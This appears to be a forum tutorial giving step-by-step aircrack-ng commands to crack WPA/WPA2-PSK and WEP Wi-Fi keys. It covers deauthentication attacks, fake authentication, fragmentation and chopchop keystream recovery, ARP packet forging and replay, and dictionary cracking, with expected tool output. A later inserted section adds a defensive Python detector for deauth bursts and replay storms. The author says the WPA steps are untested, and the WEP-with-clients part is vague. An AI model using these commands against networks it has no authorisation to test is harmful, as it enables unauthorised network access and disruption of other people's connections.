Assumes your network card supports injection mode.
ath0, wifi0 and the like can vary from PC to PC (driver to driver).
WPA/WPA2 - PSK (Pre-Shared Key)
1.
airmon-ng stop ath0
iwconfig to confirm you have stopped all other athX interfaces as well
airmon-ng start wifi0
iwconfig to confirm ath0 is running in monitor mode
copy your MAC ADDRESS
2.
airodump-ng -c X --bssid AP:MAC:ADD:RE:SS -w psk ath0
(-c X = channel to run on, -w psk = write to file "psk")
[ch X] [elapsed 4s] [Date, Time] [WPA handshake: AP:MAC:ADD:RE:SS]
----------------------------
BSSID PWR RXQ Beacons #Data etc etc etc
3. Optional (active / not active)
aireplay-ng -0 1 -a AP:MAC:ADD:RE:SS -c CL:IE:NT:MAC ath0
(-0 = deauth, 1 = number of times)
You might want to check tcpdump for ACK packets; if there are none, go to 3
4.
aircrack-ng -w password.lst -b AP:MAC:ADD:RE:SS psk*.cap
(-w password.lst = word/password-list filename)
output:
No valid WPA handshake (go to 3)
or
choosing first network as target
------------------------------
------------------------------
airmon-ng stop wifi0
airmon-ng start ath0
---------
ifconfig xxx down
ifconfig xxx up
iwconfig xxx mode managed
---------
wlanconfig ath0 destroy
ifconfig wifi0 down
ifconfig ath0 down
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 up
ifconfig wifi0 up
WEP WITHOUT CLIENTS
1. Start in monitor mode
airmon-ng stop ath0
airmon-ng start wifi0
2. Fake authentication
aireplay-ng -1 0 -e ESSID (network name) -a AP:MAC:ADD:RE:SS -h MY:MAC ath0
OR (for a tricky AP)
aireplay-ng -1 6000 -o 1 -q 10 -e ESSID (network name) -a AP:MAC -h MY:MAC ath0
3. chopchop or fragmentation to obtain the PRGA
fragmentation:
aireplay-ng -5 -b AP:MAC:ADD:RE:SS -h MY:MAC ath0
output:
Waiting for data packet...
read 127 packets...
Size: 114, FromDS: 1, ToDS: 0 (WEP)
If BSSID = AP:MAC, use the packet!
output:
Saving chosen packet in replay~~~~.cap
Data packet found
Sending fragmented packet
got REPLAYED packet!!
Saving keystream in fragment~~~~.xor
chopchop:
aireplay-ng -4 -h MY:MAC -b AP:MAC ath0
output:
Same thing: if BSSID = AP:MAC, use the packet!
output:
offset 84 (1% done) | xor = HEX | PT = HEX | x frames in x ms
Saving plaintext in replay~~~~.cap
Saving keystream in replay~~~~.xor
To reuse a half-done packet:
aireplay-ng -4 ath0 -h MY:MAC -r replay~~~~.cap
4. packetforge-ng to create an ARP packet from the PRGA
packetforge-ng -0 -a AP:MAC -h MY:MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment~~~~.xor -w random-name
output:
wrote packet to random-name
5. start airodump-ng
airodump-ng -c X --bssid AP:MAC -w filename ath0
6. Inject the ARP request (random-name)
aireplay-ng -2 -r random-name ath0
YES! use this packet!
7. Run aircrack-ng
aircrack-ng -b AP:MAC filename*.cap (the capture written by airodump-ng in step 5)
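Added example, not part of the original post: a small detector, written from the defender's side, for the two on-air patterns that WPA step 3 (deauth bursts) and WEP steps 4-6 (ARP replay) leave behind. It runs over constructed frame summaries of the kind a wireless IDS or a tshark export would give you, not live captures; all MAC addresses are made up.

```python
# Added example (not from the original post): flag deauth bursts and ARP replay
# storms in frame summaries. Input frames are dicts with ts (seconds), subtype,
# bssid, src and size; the sample data below is constructed, MACs are made up.
from collections import Counter, defaultdict

def find_deauth_bursts(frames, window=1.0, threshold=5):
    """Return {bssid: peak count} for BSSIDs with >= threshold deauth frames
    inside any `window` seconds. This is what aireplay-ng -0 produces;
    a healthy AP sends very few deauths."""
    per_bssid = defaultdict(list)
    for f in frames:
        if f["subtype"] == "deauth":
            per_bssid[f["bssid"]].append(f["ts"])
    hits = {}
    for bssid, ts in per_bssid.items():
        ts.sort()
        for i, t in enumerate(ts):
            n = sum(1 for u in ts[i:] if u - t <= window)  # frames in [t, t+window]
            if n >= threshold:
                hits[bssid] = max(hits.get(bssid, 0), n)
    return hits

def find_replay_storms(frames, window=1.0, threshold=50):
    """Return {src: peak count} for stations that sent >= threshold data frames
    of one identical size inside one `window`-second bucket. A packetforge-ng
    ARP request replayed by aireplay-ng -2 is sent unchanged, so its size
    never varies, unlike real client traffic."""
    buckets = Counter()
    for f in frames:
        if f["subtype"] == "data":
            buckets[(f["src"], f["size"], int(f["ts"] // window))] += 1
    hits = {}
    for (src, _size, _bucket), n in buckets.items():
        if n >= threshold:
            hits[src] = max(hits.get(src, 0), n)
    return hits

# Constructed sample: 8 spoofed deauths in 0.7 s, a 60-frame same-size replay
# burst from one client, and ordinary mixed-size traffic from another.
AP, CLIENT, OTHER = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "cc:dd:ee:ff:00:11"
SAMPLE = (
    [{"ts": 0.1 * i, "subtype": "deauth", "bssid": AP, "src": AP, "size": 26} for i in range(8)]
    + [{"ts": 2.0 + 0.008 * i, "subtype": "data", "bssid": AP, "src": CLIENT, "size": 68} for i in range(60)]
    + [{"ts": 2.0 + 0.05 * i, "subtype": "data", "bssid": AP, "src": OTHER, "size": 100 + i} for i in range(20)]
)

if __name__ == "__main__":
    print(find_deauth_bursts(SAMPLE))   # {'00:11:22:33:44:55': 8}
    print(find_replay_storms(SAMPLE))   # {'66:77:88:99:aa:bb': 60}
```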
------------------------------
------------------------------
airmon-ng stop wifi0
airmon-ng start ath0
---------
ifconfig xxx down
ifconfig xxx up
iwconfig xxx mode managed
---------
wlanconfig ath0 destroy
ifconfig wifi0 down
ifconfig ath0 down
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 up
ifconfig wifi0 up
WEP WITH CLIENTS
Steps 2, 3 and 4 can be dropped if you have clients logged on. Roughly, at least... it may be a little different then.
I've spent a looong time editing this, so I hope it works.
Unfortunately I've only been able to test WEP WITHOUT CLIENTS, so I don't know how good the WPA tutorial is!
Have a good holiday!